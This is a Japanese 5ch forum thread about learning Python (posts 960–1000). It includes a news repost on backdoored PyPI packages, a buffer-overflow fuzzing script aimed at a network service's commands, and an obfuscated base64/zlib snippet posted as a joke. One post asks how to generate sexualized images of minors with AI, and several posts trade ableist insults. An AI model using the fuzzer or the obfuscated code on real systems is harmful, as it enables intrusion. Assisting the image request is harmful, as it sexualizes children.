★当スレにRubyのソースコード類を書くことを禁ず★
☆Ruby等、Pythonではないプログラミング言語での回答類を書くのも禁止
☆「Ruby では」「Rubyでは」をNGワード登録推奨
◆エラーを解決したいときはエラー表示と
環境(Pythonのバージョン・OS・IDEの種類とバージョン)をシッカリ書く
◆Pythonのソースコードを5ちゃんにコピペするとインデントが崩れるので
↓にあげてるような、ソースコード用サイトに貼ってきてくだしあ
(スクリーンショットをimgurうp等の横着をしない)
ttp://ideone.com/ 推定最大手。デフォ設定がCなので、Pythonするには選択ボタン押下がピコ手間かも。
ttp://codepad.org/ ほぼ直感的に使える。Run codeボタンあり。
ttp://pastebin.com/ まずまずシンプル。
ttp://dpaste.com/ とてもシンプル。消えるまでの日数は十分長ーく指定のこと。
ttps://jupyter.org/try (旧try.jupyter.org)ちょっとめんどうそう。
ttps://ja.osdn.net/pastebin/ ログイン必須になりやがった(゚Д゚#)
◇Pythonオフィシャルサイト
http://www.python.org/
◇まとめwiki
ttp://python.rdy.jp/
●関連スレ●
くだすれPython(超初心者用) その43【Ruby禁止】
http://mevius.5ch.net/test/read.cgi/tech/1555397061/
〇前スレ
Pythonのお勉強 Part59
http://mevius.5ch.net/test/read.cgi/tech/1552194662/
次スレの建立は>>985が挑戦する
探検
Pythonのお勉強 Part60
レス数が1000を超えています。これ以上書き込みはできません。
1デフォルトの名無しさん
2019/04/30(火) 08:34:23.34ID:sH/UeeJ6960デフォルトの名無しさん
2019/07/18(木) 22:08:41.79ID:JZFbYeti 悪意ある「Python」ライブラリーがPyPIで発見される--研究者が報告
Catalin Cimpanu(Special to ZDNet.com) 翻訳校正:編集部 2019年07月18日 11時12分
https://japan.zdnet.com/article/35140047/
セキュリティ企業のReversingLabsは、悪意ある「Python」ライブラリーが公式の
「Python Package Index」(PyPI)にアップロードされていることを発見した。
これら3つのパッケージ(「libpeshnx」「libpesh」「libari」)は、同じユーザー
(名前はruri12)によって作成されており、2017年11月以降、20カ月近くにわたってPyPI
からダウンロード可能な状態にあった。2019年7月に入って、これらのパッケージは、
ReversingLabsのセキュリティ研究者らによって発見された。
ReversingLabsは7月9日、PyPIのリポジトリメンテナーに通報し、PyPIのセキュリティ
チームはその日のうちにこれらのパッケージを削除した。(中略)
ReversingLabsによると、バックドアはインタラクティブシェルであり、攻撃者はそれを
使って、3つのパッケージがインストールされたコンピューターに接続し、コマンドを実行
した可能性があるという。
ReversingLabsが3つのパッケージを見つけたとき、バックドアはlibpeshnxでのみアク
ティブになっていたが、ほかの2つのパッケージ(libpeshとlibari)には「コードのない
悪意ある関数への参照」が含まれていた。このことは、作者がバックドアを削除したか、
あるいは、ほかの2つのパッケージのバックドアを含むバージョンをロールアウトする準備
を進めていた可能性を示唆している。
Catalin Cimpanu(Special to ZDNet.com) 翻訳校正:編集部 2019年07月18日 11時12分
https://japan.zdnet.com/article/35140047/
セキュリティ企業のReversingLabsは、悪意ある「Python」ライブラリーが公式の
「Python Package Index」(PyPI)にアップロードされていることを発見した。
これら3つのパッケージ(「libpeshnx」「libpesh」「libari」)は、同じユーザー
(名前はruri12)によって作成されており、2017年11月以降、20カ月近くにわたってPyPI
からダウンロード可能な状態にあった。2019年7月に入って、これらのパッケージは、
ReversingLabsのセキュリティ研究者らによって発見された。
ReversingLabsは7月9日、PyPIのリポジトリメンテナーに通報し、PyPIのセキュリティ
チームはその日のうちにこれらのパッケージを削除した。(中略)
ReversingLabsによると、バックドアはインタラクティブシェルであり、攻撃者はそれを
使って、3つのパッケージがインストールされたコンピューターに接続し、コマンドを実行
した可能性があるという。
ReversingLabsが3つのパッケージを見つけたとき、バックドアはlibpeshnxでのみアク
ティブになっていたが、ほかの2つのパッケージ(libpeshとlibari)には「コードのない
悪意ある関数への参照」が含まれていた。このことは、作者がバックドアを削除したか、
あるいは、ほかの2つのパッケージのバックドアを含むバージョンをロールアウトする準備
を進めていた可能性を示唆している。
961デフォルトの名無しさん
2019/07/18(木) 22:12:13.82ID:/biP2h00 ルリルリ
962デフォルトの名無しさん
2019/07/18(木) 23:33:11.30ID:ixQnk4MT963デフォルトの名無しさん
2019/07/19(金) 23:56:12.27ID:f2UtXuai964デフォルトの名無しさん
2019/07/20(土) 05:54:56.19ID:bpLSWw1y エモいITキッズフェスが割とヤバ目なので寄付しろ
https://twitter.com/kondo_orange/status/1084963372624420864?s=21
https://twitter.com/kondo_orange/status/1147771514881601536?s=21
チャイルドフィルター、白Zでおなじみサイバーセキュリティ財団 宮脇プレゼンツ
https://csf.or.jp/about/
https://twitter.com/biwam/status/1108021515117715461?s=21
https://twitter.com/garhitech/status/1088991484978724865?s=21
https://twitter.com/jellyfishmovie/status/1126480155960983552?s=21
https://twitter.com/iteenslab/status/820544834310062081?s=21
https://readyfor.jp/projects/exakids2019
https://twitter.com/kondo_orange/status/1091538007633518592?s=21
https://twitter.com/5chan_nel (5ch newer account)
https://twitter.com/kondo_orange/status/1084963372624420864?s=21
https://twitter.com/kondo_orange/status/1147771514881601536?s=21
チャイルドフィルター、白Zでおなじみサイバーセキュリティ財団 宮脇プレゼンツ
https://csf.or.jp/about/
https://twitter.com/biwam/status/1108021515117715461?s=21
https://twitter.com/garhitech/status/1088991484978724865?s=21
https://twitter.com/jellyfishmovie/status/1126480155960983552?s=21
https://twitter.com/iteenslab/status/820544834310062081?s=21
https://readyfor.jp/projects/exakids2019
https://twitter.com/kondo_orange/status/1091538007633518592?s=21
https://twitter.com/5chan_nel (5ch newer account)
965デフォルトの名無しさん
2019/07/20(土) 06:10:38.24ID:1p062bPE なにこの集団ちんどん屋かな?w
966デフォルトの名無しさん
2019/07/20(土) 07:03:51.33ID:RdS7+qpt pytorchの解説がどれもむずかしいのですが、初心者ははじめに何やれば良いんでしょうか
最終目的はaiでロリ画像を作ることです
最終目的はaiでロリ画像を作ることです
967デフォルトの名無しさん
2019/07/20(土) 08:15:40.55ID:P9wbpcK8968デフォルトの名無しさん
2019/07/20(土) 12:06:50.56ID:DSdlNNWZ これバッファオーバーフロー起こすとかで実行してみたんだが、全くそんな様子はない
どっか文法間違ってる?
import socket
buffer=["A"]
counter=50
while len(buffer) <=100:
buffer.append("A"*counter)
counter=counter+50
commands=["HELP", "STATS.", "RTIME.", "ITIME.", "SRUN.","TRUN.", "GMON.",
"GDOG.", "KSTET.", "GTER.", "HTER.", "LTER.", "KSTAN."]
for command in commands:
for buffstring in buffer:
print ("Exploiting" +command+":"+str(len(buffstring)))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',135))
s.recv(50)
s.send(command+buffstring)
s.close()
どっか文法間違ってる?
import socket
buffer=["A"]
counter=50
while len(buffer) <=100:
buffer.append("A"*counter)
counter=counter+50
commands=["HELP", "STATS.", "RTIME.", "ITIME.", "SRUN.","TRUN.", "GMON.",
"GDOG.", "KSTET.", "GTER.", "HTER.", "LTER.", "KSTAN."]
for command in commands:
for buffstring in buffer:
print ("Exploiting" +command+":"+str(len(buffstring)))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',135))
s.recv(50)
s.send(command+buffstring)
s.close()
969デフォルトの名無しさん
2019/07/20(土) 12:08:04.60ID:DSdlNNWZ ちなみに消えちゃってるがちゃんとforの後のインデントや冒頭スペースは入れてる
970デフォルトの名無しさん
2019/07/20(土) 12:34:25.27ID:e0GouTyf 全バージョンで?
971デフォルトの名無しさん
2019/07/20(土) 12:52:58.13ID:yIzn2tUG 触ったことないんだけどAIで使うって聞いて、遅いって聞いて、は?と思ったら
遅いから数学関数を多数用意したところ、数学関数を多用するAIに向いてると
あとインデント式は普通の開発には厄介な面もあるけど、
ひたすら論理の整理が必要なAIには視認性が良くて便利なのかね
遅いから数学関数を多数用意したところ、数学関数を多用するAIに向いてると
あとインデント式は普通の開発には厄介な面もあるけど、
ひたすら論理の整理が必要なAIには視認性が良くて便利なのかね
972デフォルトの名無しさん
2019/07/20(土) 13:06:10.76ID:gi8tQNT4 >>971
Rubyよりマシだから
Rubyよりマシだから
973デフォルトの名無しさん
2019/07/20(土) 13:08:21.22ID:P9wbpcK8974デフォルトの名無しさん
2019/07/20(土) 13:08:56.78ID:P9wbpcK8 >>971
もっとしらべてからでなおしてきましょう
もっとしらべてからでなおしてきましょう
975デフォルトの名無しさん
2019/07/20(土) 14:00:42.75ID:yIzn2tUG 何が気に入らんのかねこの基地外はw
977デフォルトの名無しさん
2019/07/20(土) 16:51:17.49ID:enH3UtlX 971の前半のガイジ臭やべえ
978デフォルトの名無しさん
2019/07/20(土) 17:31:12.31ID:P9wbpcK8 アスペというよりADHD系だな
979デフォルトの名無しさん
2019/07/20(土) 18:05:53.13ID:MLRoJe+u980デフォルトの名無しさん
2019/07/20(土) 18:21:08.11ID:ppdy8tl0 臭う
●buffer=["A"]
●buffer.append("A"*counter)
●for buffstring in buffer:
●print ("Exploiting" +command+":"+str(len(buffstring)))
一酸化炭素くさい
●buffer=["A"]
●buffer.append("A"*counter)
●for buffstring in buffer:
●print ("Exploiting" +command+":"+str(len(buffstring)))
一酸化炭素くさい
981デフォルトの名無しさん
2019/07/20(土) 18:34:39.82ID:P9wbpcK8 >>979
_, ._
( ゚ Д゚)っ >環境(Pythonのバージョン・OS・IDEの種類とバージョン)をシッカリ書く
たしか
さいきんのPython3系は簡単お手軽なバッファオーバーフローができないように
セキュリティホールふさいだとかなんとかいう
_, ._
( ゚ Д゚)っ >環境(Pythonのバージョン・OS・IDEの種類とバージョン)をシッカリ書く
たしか
さいきんのPython3系は簡単お手軽なバッファオーバーフローができないように
セキュリティホールふさいだとかなんとかいう
982デフォルトの名無しさん
2019/07/20(土) 20:10:18.56ID:P9wbpcK8983デフォルトの名無しさん
2019/07/20(土) 20:40:20.56ID:P9wbpcK8984デフォルトの名無しさん
2019/07/20(土) 21:30:17.02ID:MLRoJe+u >>982
サンクスコ!なんとなくWhile文がAの参照の悪さをしてそうでつね!
サンクスコ!なんとなくWhile文がAの参照の悪さをしてそうでつね!
985デフォルトの名無しさん
2019/07/20(土) 22:03:12.00ID:P9wbpcK8986デフォルトの名無しさん
2019/07/20(土) 22:33:54.07ID:zBgCRbaT >>980
一酸化炭素は無臭だから怖い
一酸化炭素は無臭だから怖い
987デフォルトの名無しさん
2019/07/20(土) 22:42:14.22ID:P9wbpcK8 >>986
(`・ω・´)っ◇ 座布団1枚!
(`・ω・´)っ◇ 座布団1枚!
988デフォルトの名無しさん
2019/07/20(土) 23:38:50.97ID:MLRoJe+u >>985
大サンクスコヽ(`Д´)ノ
ぶっちゃけると、どっかのセキュリティベンダー試験のWeb問題の中の、バッファオーバーフローをテーマにした問題で、
BOFを引き起こす意図であろうPython文が画像になっていて、その文字も曖昧なコード部分をいったい全部手書きにしたもの
大サンクスコヽ(`Д´)ノ
ぶっちゃけると、どっかのセキュリティベンダー試験のWeb問題の中の、バッファオーバーフローをテーマにした問題で、
BOFを引き起こす意図であろうPython文が画像になっていて、その文字も曖昧なコード部分をいったい全部手書きにしたもの
989デフォルトの名無しさん
2019/07/21(日) 05:13:00.04ID:utEuQb4D990デフォルトの名無しさん
2019/07/21(日) 08:15:24.48ID:LZnzMQmE これネットワーク攻撃用のコードで、BOFが起きるのは相手先のサービスなのでは
991デフォルトの名無しさん
2019/07/21(日) 12:25:10.85ID:pUigi9Rs a='eJyLMPVXDFB1cAyINokJiIowNdEIiNM0d3bWNK9VcfV0dgzSDQ5x9HNxDHLRdfQL8QzzDAoN1g1xDQ7RdfP0cVVU8dD20AIAdFQSDw=='
open('/tmp/txt', 'w').write(zlib.decompress(base64.b64decode(a)))
open('/tmp/txt', 'w').write(zlib.decompress(base64.b64decode(a)))
992デフォルトの名無しさん
2019/07/21(日) 12:56:34.65ID:utEuQb4D >>991
やめーやwwwww
やめーやwwwww
993デフォルトの名無しさん
2019/07/21(日) 13:25:44.57ID:pX/j+UhJ 圧縮した方がデカくなってしまったな
994デフォルトの名無しさん
2019/07/21(日) 13:38:48.79ID:utEuQb4D995デフォルトの名無しさん
2019/07/21(日) 14:11:43.62ID:ujIu4Dcu >>991
これは何してるの(´・ω・)?
これは何してるの(´・ω・)?
996デフォルトの名無しさん
2019/07/21(日) 14:15:12.38ID:utEuQb4D >>991
ヒント
・これだけでは不完全なので動かない
足りないimportはいくつでしょーか
・たぶん1か所だけぼみょうにまちがっつる
半角1文字足りない
ヒント
・これだけでは不完全なので動かない
足りないimportはいくつでしょーか
・たぶん1か所だけぼみょうにまちがっつる
半角1文字足りない
997デフォルトの名無しさん
2019/07/21(日) 14:16:07.95ID:utEuQb4D998デフォルトの名無しさん
2019/07/21(日) 14:23:23.00ID:vUdOQrA4 要するにブラクラかなんかで存在自体が犯罪かなんかだろ
999デフォルトの名無しさん
2019/07/21(日) 14:28:14.29ID:utEuQb4D >>998
>存在自体が犯罪かなんか
なかなかいい発想だが
だったら>>992で芝生はやしてワロテる暇ないから(・∀・)
>>次スレ
Pythonのお勉強 Part61
http://mevius.5ch.net/test/read.cgi/tech/1563622784/
>存在自体が犯罪かなんか
なかなかいい発想だが
だったら>>992で芝生はやしてワロテる暇ないから(・∀・)
>>次スレ
Pythonのお勉強 Part61
http://mevius.5ch.net/test/read.cgi/tech/1563622784/
1000デフォルトの名無しさん
2019/07/21(日) 14:46:11.73ID:m/GaQUZU おつ
10011001
Over 1000Thread このスレッドは1000を超えました。
新しいスレッドを立ててください。
life time: 82日 6時間 11分 48秒
新しいスレッドを立ててください。
life time: 82日 6時間 11分 48秒
レス数が1000を超えています。これ以上書き込みはできません。
ニュース
- 「脅迫だ」国分太一に同情論 音声データ削除要求など日テレの対応を疑問視する声ネットに噴出「それこそコンプラ違反では」★2 [muffin★]
- 【国際法を無視】日本での「中華人民共和国に台湾問題を論じる資格なし」との声に 中国外交部が厳しく反論… ★2 [BFU★]
- 【工作員】「X」のアカウント所在地公開機能が暴いた世論操作の実態 MAGA支持著名アカウントの多くが米国外から運営 日本にも波及 ★3 [ごまカンパチ★]
- 生クリームだけの真っ白なクリスマスケーキ 大手メーカーが販売、その理由は…フルーツなしで価格は半額以下に ★3 [おっさん友の会★]
- 【文春】元TOKIO・国分太一(51)「女性スタッフ2名への“わいせつ事案”」日テレ事情聴取の全貌が分かった! ★5 [Ailuropoda melanoleuca★]
- 首相答弁「スパイ防止法、外国代理人登録法、ロビー活動公開法などについて速やかに法案を策定する」 [1ゲットロボ★]
- 中国外務省「全く不十分だ。ごまかすような手口を使うべきではない」高市答弁を批判 [834922174]
- まったりまったりおじゃる丸待機スレ🏡
- ヤンジャン新人漫画大賞、入賞作品のAI絵疑惑で大荒れ😄😄😄 高市早苗要素あり [175344491]
- 高市応援団「都合よく解釈するな」「撤回すると言ってない」「中国と断交」「撤回する必要ない」「答弁変わってない」「武力行使しろ」 [931948549]
- 【急募】性欲抜きのまんこの魅力 [904880432]
- 合法の範囲でできることをやり尽くした人間は犯罪行為に興味を持ちがち